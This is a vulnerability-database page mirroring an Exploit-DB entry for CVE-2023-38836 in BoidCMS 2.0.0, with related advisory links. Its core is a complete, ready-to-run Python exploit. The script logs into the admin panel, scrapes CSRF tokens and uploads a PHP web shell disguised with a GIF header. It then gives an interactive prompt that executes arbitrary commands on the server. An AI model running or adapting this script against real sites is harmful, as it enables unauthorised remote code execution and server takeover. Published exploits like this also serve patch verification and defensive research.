Lucene search

K

BoidCMS v2.0.0 - authenticated file upload vulnerability

🗓️ 09 Oct 2023 00:00:00Reported by 1337kidType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 291 Views

BoidCMS v2.0.0 - authenticated file upload vulnerabilit

Show more
Related
Code
ReporterTitlePublishedViews
Family
Cvelist
CVE-2023-38836
21 Aug 202300:00
cvelist
Metasploit
BoidCMS Command Injection
12 Feb 202423:44
metasploit
OSV
CVE-2023-38836
21 Aug 202317:15
osv
Vulnrichment
CVE-2023-38836
21 Aug 202300:00
vulnrichment
0day.today
BoidCMS v2.0.0 - authenticated file upload Exploit
9 Oct 202300:00
zdt
0day.today
BoidCMS 2.0.0 Command Injection Exploit
2 Mar 202400:00
zdt
CVE
CVE-2023-38836
21 Aug 202317:15
cve
Prion
Unrestricted file upload
21 Aug 202317:15
prion
Packet Storm
BoidCMS 2.0.0 Shell Upload
10 Oct 202300:00
packetstorm
Packet Storm
BoidCMS 2.0.0 Command Injection
1 Mar 202400:00
packetstorm
Rows per page
#!/usr/bin/python3
# Exploit Title: BoidCMS v2.0.0 - authenticated file upload vulnerability
# Date: 08/21/2023
# Exploit Author: 1337kid
# Vendor Homepage: https://boidcms.github.io/#/
# Software Link: https://boidcms.github.io/BoidCMS.zip
# Version: <= 2.0.0
# Tested on: Ubuntu
# CVE : CVE-2023-38836

import requests
import re
import argparse

parser = argparse.ArgumentParser(description='Exploit for CVE-2023-38836')
parser.add_argument("-u", "--url", help="website url")
parser.add_argument("-l", "--user", help="admin username")
parser.add_argument("-p", "--passwd", help="admin password")
args = parser.parse_args()
base_url=args.url
user=args.user
passwd=args.passwd

def showhelp():
	print(parser.print_help())
	exit()
if base_url == None: showhelp()
elif user == None: showhelp()
elif passwd == None: showhelp()

with requests.Session() as s:
	req=s.get(f'{base_url}/admin')
	token=re.findall('[a-z0-9]{64}',req.text)
	form_login_data={
		"username":user,
		"password":passwd,
		"login":"Login",
	}
	form_login_data['token']=token
	s.post(f'{base_url}/admin',data=form_login_data)
	#=========== File upload to RCE
	req=s.get(f'{base_url}/admin?page=media')
	token=re.findall('[a-z0-9]{64}',req.text)
	form_upld_data={
		"token":token,
		"upload":"Upload"
	}
	#==== php shell
	php_code=['GIF89a;\n','<?php system($_GET["cmd"]) ?>']
	with open('shell.php','w') as f:
		f.writelines(php_code)
	#====
	file = {'file' : open('shell.php','rb')}
	s.post(f'{base_url}/admin?page=media',files=file,data=form_upld_data)
	req=s.get(f'{base_url}/media/shell.php')
	if req.status_code == '404':
		print("Upload failed")
		exit()
	print(f'Shell uploaded to "{base_url}/media/shell.php"')
	while 1:
		cmd=input("cmd >> ")
		if cmd=='exit': exit()
		req=s.get(f'{base_url}/media/shell.php',params = {"cmd": cmd})
		print(req.text)

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
09 Oct 2023 00:00Current
8.8High risk
Vulners AI Score8.8
CVSS38.8
EPSS0.779
SSVC
291
.json
Report